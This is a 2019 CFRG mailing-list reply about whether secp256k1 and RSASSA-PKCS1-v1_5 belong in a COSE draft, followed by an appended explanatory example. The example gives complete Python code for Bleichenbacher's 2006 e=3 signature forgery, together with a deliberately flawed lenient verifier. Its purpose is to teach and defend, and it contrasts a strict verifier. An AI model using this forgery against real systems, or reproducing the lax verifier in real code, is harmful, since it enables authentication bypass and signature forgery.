Re: [Cfrg] Recommending secp256k1 in FIPS 186-5

Neil Madden <> Thu, 19 December 2019 19:10 UTC

From: Neil Madden <>
Date: Thu, 19 Dec 2019 19:10:26 +0000
To: Tony Arcieri <>
Cc: Dan Burnett <>, CFRG <>

> On 19 Dec 2019, at 18:02, Tony Arcieri <> wrote:
>> On Thu, Dec 19, 2019 at 9:56 AM Neil Madden <> wrote:
>> But see ...
> I can't say I think too highly of a draft dated November 1st, 2019 which is recommending only RSASSA PKCS#1v1.5 and ECDSA w/ secp256k1.
> Especially in the case of the former this seems unwise given the lingering history of BB'06 (which continues to cause real-world breakages... there was a BlackHat talk about it this year)

Indeed. As I understand it that draft is registering algorithm identifiers already in use by WebAuthn/FIDO (TPM attestation I believe) and the RSA ones are all explicitly marked as non-recommended or immediately deprecated.

However, secp256k1 *is* currently marked as recommended in that draft. For signature use only; I managed to get explicit wording added not recommending it for ECIES/“ECDH-ES” encryption, but I’m not aware of any specific weakness for ECDSA use, so I didn’t argue against it for that. If there are concerns for signature use then it’d be good to raise them with the COSE WG now.

(I had a brief look at that draft when it was brought to my attention as it also registers JOSE algorithms, which might impact my employer. I’ve not followed either that draft or the COSE WG very much since so I don’t know much about it beyond what is in the draft itself).

— Neil
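The "BB'06" breakage Tony refers to above is Bleichenbacher's 2006 forgery against RSASSA-PKCS1-v1_5 verifiers that parse the padding leniently. The following is an added example, not code from the thread or from any of the drafts discussed: it forges a signature for a message nobody signed, with no private key at all, and shows a lax verifier accepting it while a strict verifier (one that compares against the full canonical encoding) rejects it. It assumes e = 3, SHA-256, and a constructed 2048-bit stand-in modulus; any real 2048-bit modulus with e = 3 works just as well, because the forged cube never wraps modulo n.

```python
# Added example, not part of the CFRG thread: Bleichenbacher '06 forgery
# against RSASSA-PKCS1-v1_5 with e = 3, using only the standard library.
import hashlib

E = 3
N = (1 << 2047) | 12345            # constructed stand-in modulus, 2048 bits (any e=3 modulus of this size works)
K = (N.bit_length() + 7) // 8      # octet length of the modulus: 256

# DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1)
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def digest_info(msg: bytes) -> bytes:
    return SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()


def emsa_pkcs1_v1_5_encode(msg: bytes, k: int) -> bytes:
    """Canonical EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 || DigestInfo."""
    t = digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def verify_strict(n: int, e: int, sig: int, msg: bytes) -> bool:
    """Correct verifier: re-encode and compare the whole block."""
    em = pow(sig, e, n).to_bytes(K, "big")
    return em == emsa_pkcs1_v1_5_encode(msg, K)


def verify_lax(n: int, e: int, sig: int, msg: bytes) -> bool:
    """Vulnerable verifier: parses from the left and never checks that
    DigestInfo ends exactly at the end of the block."""
    em = pow(sig, e, n).to_bytes(K, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return False
    t = digest_info(msg)
    return em[i + 1:i + 1 + len(t)] == t     # BUG: trailing bytes are ignored


def icbrt(x: int) -> int:
    """Floor integer cube root by binary search (exact for big ints)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def forge(msg: bytes, k: int) -> int:
    """Bleichenbacher '06: put a minimal padding + DigestInfo at the top of
    the block, leave the bottom as garbage, and take the cube root. Because
    the garbage region is far wider than the rounding error of the cube
    root, s**3 still begins with the bytes the lax parser checks."""
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = icbrt(target)
    if s ** 3 < target:
        s += 1                     # round up so the high bytes are preserved
    return s


if __name__ == "__main__":
    msg = b"constructed message that nobody signed"   # constructed input
    sig = forge(msg, K)
    print("lax verifier accepts forgery:   ", verify_lax(N, E, sig, msg))
    print("strict verifier accepts forgery:", verify_strict(N, E, sig, msg))
```

The fix is structural rather than a patch to the parser: a verifier should construct the expected encoded block itself and compare it in full, so that no amount of cleverness in the trailing bytes can matter. The same keyless forgery fails for large exponents such as 65537 because the cube-root trick relies on s^e staying below n.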